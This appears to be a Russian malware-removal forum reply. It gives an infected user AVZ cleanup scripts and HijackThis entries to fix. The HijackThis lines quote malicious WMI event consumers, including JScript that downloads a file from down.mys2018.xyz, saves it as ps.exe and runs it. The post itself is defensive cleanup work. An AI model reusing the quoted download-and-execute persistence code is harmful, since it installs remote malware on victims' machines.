Выполните скрипт в AVZ:
Код:
begin
TerminateProcessByName('c:\windows\system\msinfo.exe');
QuarantineFile('c:\windows\system\msinfo.exe', '');
QuarantineFile('c:\windows\system\my1.bat', '');
QuarantineFile('c:\windows\system32\wbem\123.bat', '');
QuarantineFileF('C:\Program Files\kugou2010', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js', true, '', 0, 0);
QuarantineFileF('C:\Program Files\shengda', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.js', true, '', 0, 0);
DeleteFile('C:\Users\Администратор\WINDOWS\Tasks\my1.job', '64');
DeleteFile('c:\windows\system\msinfo.exe', '');
DeleteFile('c:\windows\system\my1.bat', '');
DeleteFile('c:\windows\system32\wbem\123.bat', '64');
DeleteFile('E:\autorun.inf', '');
ExecuteFile('schtasks.exe', '/delete /TN "my1" /F', 0, 15000, true);
DeleteFileMask('C:\Program Files\kugou2010', '*', true);
DeleteFileMask('C:\Program Files\shengda', '*', true);
DeleteDirectory('C:\Program Files\kugou2010');
DeleteDirectory('C:\Program Files\shengda');
RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run-', 'BGClients');
CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip');
ExecuteSysClean;
ExecuteWizard('SCU', 2, 2, true);
end.
Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):
Код:
O25 - WMI Event: [fuckyoumm2_consumer] fuckyoumm2_filter - var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://down.mys2018.xyz:280/psa.jpg",0);x.Send();var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);s.SaveToFile("C:\\\\WINDOWS\\\\ps.exe",2);var r = new ActiveXObject("WScript.Shell.1");r.Run(328 bytes)
O25 - WMI Event: [fuckyoumm_consumer] fuckyoumm_filter - var toff=3000;var fso=new ActiveXObject("Scripting.FilesystemObject");var http=new ActiveXObject("Msxml2.ServerXMLHTTP");if(!fso.FileExists('wpd.xml')){var f=fso.CreateTextFile('wpd.xml',2);f.writeLine('54.255.141.50'+'\r\n'+'78.142.29.152'+'\r\n'+'74.222.14.61'+'\r\n'+'70.39.124.66');f.Close();}var(2698 bytes)
Пожалуйста, перезагрузите компьютер вручную.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.
Выполните скрипт в AVZ при наличии доступа в интернет:
Код:
var
LogPath : string;
ScriptPath : string;
begin
LogPath := GetAVZDirectory + 'log\avz_log.txt';
if FileExists(LogPath) Then DeleteFile(LogPath);
ScriptPath := GetAVZDirectory +'ScanVuln.txt';
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 1) then ExecuteScript(ScriptPath) else begin
if DownloadFile('http://dataforce.ru/~kad/ScanVuln.txt', ScriptPath, 0) then ExecuteScript(ScriptPath) else begin
ShowMessage('Невозможно загрузить скрипт AVZ для обнаружения наиболее часто используемых уязвимостей!');
exit;
end;
end;
if FileExists(LogPath) Then ExecuteFile('notepad.exe', LogPath, 1, 0, false)
end.
После его работы, если будут найдены уязвимости, в блокноте откроется файл avz_log.txt, прикрепите его к сообщению.
Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.